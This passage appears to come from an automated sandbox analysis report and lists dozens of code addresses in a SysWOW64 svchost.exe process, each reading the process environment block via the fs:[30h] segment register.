Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]	2_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]	2_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]	2_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]	2_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]	2_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]	2_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]	2_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]	2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]	2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]	2_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]	2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]	2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]	2_2_0370625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]	2_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]	2_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]	2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]	2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]	2_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]	2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]	2_2_037062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]	2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]	2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]	2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]	2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]	2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]	2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]	2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]	2_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]	2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]	2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]	2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]	2_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]	2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]	2_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]	2_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]	2_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]	2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]	2_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]	2_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]	2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]	2_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]	2_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]	2_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]	2_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]	2_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]	2_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]	2_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]	2_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]	2_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]	2_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]	2_2_036C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]	2_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]	2_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]	2_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]	2_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]	2_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]	2_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]	2_2_036280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]	2_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]	2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]	2_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]	2_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]	2_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]	2_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]	2_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]	2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]	2_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]	2_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]	2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]	2_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]	2_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]	2_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]	2_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]	2_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]	2_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]	2_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]	2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]	2_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]	2_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]	2_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]	2_2_036E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]	2_2_036D678E
